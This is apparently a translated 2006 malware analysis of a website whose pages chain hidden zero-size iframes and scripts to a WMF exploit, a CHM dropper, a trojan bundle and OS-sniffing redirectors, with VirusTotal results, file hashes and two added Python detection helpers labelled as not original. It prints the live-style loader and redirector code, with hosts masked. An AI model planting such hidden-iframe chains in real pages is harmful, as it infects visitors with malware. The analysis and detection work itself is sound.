A website that downloads multiple viruses

王朝 / other · Author: anonymous  2006-05-11

Original by endurer

2006-05-10, version 1

The code of the website hxxp://www.***23down.cn contains:

<frame name="header" scrolling="no" noresize target="main" src="top.htm">

The code of hxxp://www.***23down.cn/top.htm contains:

<script language="javascript" type="text/javascript" src="hxxp://js.***a.dx03.51.la/1707.js"></script>

<script language=javascript src=hxxp://www.***475100.com/1.js></script>

The code of hxxp://www.***475100.com/1.js contains:

document.writeln("<iframe id=\"baidufttrame\" border=\"0\" vspace=\"0\" hspace=\"0\" marginwidth=\"0\" marginheight=\"0\" framespacing=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"0\" height=\"0\" src=\"http:\/\/www.***475100.com\/bd\/index.htm\"><\/iframe>")

The code of hxxp://www.***475100.com/bd/index.htm:

<iframe height="0" width="0" src="hxxp://www.***475100.com/mm.wmf"></iframe>

<iframe height="0" width="0" src="hxxp://www.***475100.com/bd/icyfox.htm"></iframe>

<iframe height="0" width="0" src="hxxp://www.***475100.com/xx/"></iframe>

<iframe src="mm.html" name="zhu" width="0" height="0" frameborder="0"></iframe>

<iframe src="joke.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>

<iframe src="免费色情电影播放器.exe" name="zhu" width="0" height="0" frameborder="0"></iframe>
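As an added example (not part of the original post), a small Python scanner for the loader pattern shown above: zero-size iframes, external script includes, frame sources pointing at .wmf/.exe/.chm files, and iframes injected at run time through document.writeln() as 1.js does. The sample input is constructed from the snippets above, with the .exe renamed to a neutral placeholder and one normal-sized frame added as a control; function and class names are my own.

```python
import re
from html.parser import HTMLParser

# File types this chain delivers through hidden frames (taken from the page).
PAYLOAD_EXT = ('.wmf', '.exe', '.chm')
# Markup injected at run time through document.write / document.writeln("...").
WRITELN_RE = re.compile(r'document\.write(?:ln)?\(\s*"((?:[^"\\]|\\.)*)"\s*\)')

def is_hidden(a):
    """A zero-size or display:none frame is the classic drive-by loader."""
    style = a.get('style', '').replace(' ', '').lower()
    return a.get('width') == '0' or a.get('height') == '0' or 'display:none' in style

class HiddenLoaderFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (kind, src)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or '') for k, v in attrs}
        src = a.get('src', '')
        if tag == 'iframe' and is_hidden(a):
            self.findings.append(('hidden-iframe', src))
        elif tag == 'script' and re.match(r'(?i)h(?:tt|xx)ps?://', src):
            self.findings.append(('external-script', src))   # hxxp accepted for defanged samples
        if src.lower().endswith(PAYLOAD_EXT):
            self.findings.append(('payload-src', src))

def scan(text):
    """Scan HTML or JS: parse the markup itself, then any markup hidden inside
    document.write(ln) string literals after undoing the JS backslash escapes."""
    p = HiddenLoaderFinder()
    p.feed(text)
    for lit in WRITELN_RE.findall(text):
        p.feed(lit.replace('\\/', '/').replace('\\"', '"'))
    p.close()
    return p.findings

# Constructed sample modelled on /bd/index.htm and 1.js above (URLs defanged,
# the .exe renamed to a placeholder, one visible frame added as a control).
SAMPLE = '''
<iframe height="0" width="0" src="hxxp://www.***475100.com/mm.wmf"></iframe>
<iframe height="0" width="0" src="hxxp://www.***475100.com/bd/icyfox.htm"></iframe>
<iframe src="player.exe" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src="about.htm" width="300" height="200"></iframe>
<script language=javascript src=hxxp://www.***475100.com/1.js></script>
<script>document.writeln("<iframe width=\\"0\\" height=\\"0\\" src=\\"http:\\/\\/www.***475100.com\\/bd\\/index.htm\\"><\\/iframe>")</script>
'''
```

scan(SAMPLE) returns seven (kind, src) findings and nothing for the visible about.htm frame; the same call works on a fetched .htm or .js body.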

mm.wmf is reported by Jiangmin KV as: Exploit.WMF.SetAbortProc

Complete scanning result of "mm.wmf", received in VirusTotal at 05.10.2006, 16:03:09 (CET).

Antivirus            Version          Update      Result
AntiVir              6.34.1.27        05.10.2006  EXP/MS06-001.WMF
Avast                4.6.695.0        05.10.2006  MS06-001 WMF Exploit
AVG                  386              05.09.2006  May be infected by unknown virus Exploit.WMF
BitDefender          7.2              05.10.2006  Exploit.Win32.WMF-PFV
CAT-QuickHeal        8.00             05.09.2006  WMF.Exploit
ClamAV               devel-20060426   05.10.2006  Exploit.WMF.A
DrWeb                4.33             05.10.2006  Exploit.MS05-053
eTrust-InoculateIT   23.72.4          05.10.2006  Win32/Worfo.Variant!Trojan
eTrust-Vet           12.4.2203        05.10.2006  Win32/Worfo
Ewido                3.5              05.10.2006  Exploit.MS05-053-WMF
Fortinet             2.76.0.0         05.10.2006  suspicious
F-Prot               3.16c            05.09.2006  no virus found
Ikarus               0.2.65.0         05.10.2006  Exploit.IMG-WMF
Kaspersky            4.0.2.24         05.10.2006  Exploit.Win32.IMG-WMF.u
McAfee               4758             05.09.2006  Exploit-WMF
Microsoft            1.1372           05.10.2006  TrojanDownloader:Win32/Wmfpfv
NOD32v2              1.1529           05.10.2006  a variant of Win32/Exploit.WMF
Norman               5.90.17          05.10.2006  W32/Exploit.Gen
Panda                9.0.0.4          05.10.2006  Exploit/Metafile
Sophos               4.05.0           05.10.2006  Exp/WMF-A
Symantec             8.0              05.10.2006  Trojan.Ducky.B
TheHacker            5.9.7.141        05.10.2006  Exploit/WMF
UNA                  1.83             05.06.2006  Exploit.WMF.IMG
VBA32                3.11.0           05.09.2006  Exploit.WMF

Additional information

File size: 17253 bytes

MD5: eeab0824a7a4e53dabddfc019501e5f5

SHA1: fce0693db77cb47025e707f682d9df33ab752f12

icyfox.htm is reported by Jiangmin KV as: Exploit.MHtRedir

icyfox.htm downloads and runs icyfox.js

icyfox.js is actually a CHM file; it drops and runs an EXE file. Jiangmin KV's virus database of 2006-05-10 cannot detect or remove it.

Complete scanning result of "icyfox.js", received in VirusTotal at 05.10.2006, 16:18:28 (CET).

Antivirus            Version          Update      Result
AntiVir              6.34.1.27        05.10.2006  TR/Dldr.Small.TZ.49
Avast                4.6.695.0        05.10.2006  Win32:Trojano-3583
AVG                  386              05.09.2006  no virus found
BitDefender          7.2              05.10.2006  Trojan.Downloader.Small.NB
CAT-QuickHeal        8.00             05.09.2006  TrojanDownloader.Small.tz
ClamAV               devel-20060426   05.10.2006  no virus found
DrWeb                4.33             05.10.2006  Trojan.DownLoader.2791
eTrust-InoculateIT   23.72.4          05.10.2006  Win32/SillyDL.7fl!Trojan
eTrust-Vet           12.4.2203        05.10.2006  no virus found
Ewido                3.5              05.10.2006  no virus found
Fortinet             2.76.0.0         05.10.2006  no virus found
F-Prot               3.16c            05.09.2006  no virus found
Ikarus               0.2.65.0         05.10.2006  no virus found
Kaspersky            4.0.2.24         05.10.2006  Trojan-Downloader.Win32.Small.tz
McAfee               4758             05.09.2006  Exploit-CodeBase.chm
Microsoft            1.1372           05.10.2006  TrojanDownloader:Win32/Small!3817
NOD32v2              1.1529           05.10.2006  Win32/TrojanDownloader.Small.TZ
Norman               5.90.17          05.10.2006  no virus found
Panda                9.0.0.4          05.10.2006  Suspicious file
Sophos               4.05.0           05.10.2006  Troj/Small-BDM
Symantec             8.0              05.10.2006  no virus found
TheHacker            5.9.7.141        05.10.2006  no virus found
UNA                  1.83             05.06.2006  no virus found
VBA32                3.11.0           05.09.2006  Trojan-Downloader.Win32.Small.tz

Additional information

File size: 9676 bytes

MD5: 2f3c8d0f3c5cc12cc221c78701811517

SHA1: 98b848f95f2319369837e0a7fb4d4c48dd6e59dd

joke.htm is reported by Jiangmin KV as: Exploit.VBS.Phel.bc

免费色情电影播放器.exe contains three files:

lsasss.exe is reported by Jiangmin KV as: Trojan/VB.Small.bi

QQ.Exe is reported by Jiangmin KV as: TrojanDownloader.MiniQrz

hy.exe is reported by Jiangmin KV as: TrojanDownloader.MiniQrz

The code of hxxp://www.***475100.com/xx/ is:

<script language=javascript>ie='wxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='wnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

Depending on the Windows and IE version, it downloads wxp.htm, wnt.htm or w98.htm accordingly.

The contents of wxp.htm, wnt.htm and w98.htm are encoded with Encode() and Escape(); they download/run:

1) hxxp://www.***475100.com/xx//dongfang.gif

dongfang.gif is a script obfuscated through eval().

2) Opens hxxp://www.***5173a.com/door/index.htm

The content of hxxp://www.***5173a.com/door/index.htm is:

<script language=javascript>ie='winxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

<script src='http://s37.cnzz.com/stat.php?id=121168&web_id=121168' language='JavaScript' charset='gb2312'></script>

Depending on the Windows and IE version, it downloads winxp.htm, winnt.htm or w98.htm accordingly.
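As an added example (not part of the original post), a Python helper for the two version-sniffing redirectors quoted above: it lists every landing page a redirector can route to, keyed to the navigator.appVersion substring that selects it, and emulates the routing for a given appVersion string, so an analyst can collect wxp.htm, wnt.htm and w98.htm without re-running the page under a different browser for each. The two script bodies are copied from the page; the function names are my own.

```python
import re

# The two version-sniffing redirectors quoted on this page (script bodies only).
SAMPLE_XX = ("ie='wxp';ver=navigator.appVersion;"
             "if(!(ver.indexOf('NT 5.0')==-1))ie='wnt';"
             "if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}"
             "location.href=ie+'.htm';")
SAMPLE_DOOR = ("ie='winxp';ver=navigator.appVersion;"
               "if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';"
               "if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}"
               "location.href=ie+'.htm';")

HREF_RE = re.compile(r"location\.href\s*=\s*(\w+)\s*\+\s*'([^']*)'")

def _parts(script):
    """Pull out (default name, suffix, [(appVersion needle, name), ...])."""
    m = HREF_RE.search(script)
    if not m:
        raise ValueError('no "location.href = var + suffix" redirect found')
    var, suffix = m.groups()
    default = re.search(rf"\b{var}\s*=\s*'(\w+)'", script).group(1)
    # if(!(ver.indexOf('NEEDLE')==-1))VAR='NAME'  with an optional '{' before VAR
    cond_re = re.compile(
        rf"indexOf\('([^']*)'\)\s*==\s*-1\)\)\{{?\s*{var}\s*=\s*'(\w+)'")
    return default, suffix, cond_re.findall(script)

def enumerate_branches(script):
    """Every landing page the redirector can send a visitor to, keyed to the
    navigator.appVersion substring that selects it."""
    default, suffix, conds = _parts(script)
    pages = {default + suffix: 'default'}
    for needle, name in conds:
        pages[name + suffix] = f'appVersion contains {needle!r}'
    return pages

def resolve(script, app_version):
    """Emulate the script for one appVersion value: checks run in order and a
    later match overrides an earlier one, exactly as the original executes."""
    default, suffix, conds = _parts(script)
    name = default
    for needle, branch in conds:
        if needle in app_version:
            name = branch
    return name + suffix
```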

© 2005- 王朝網路. All rights reserved.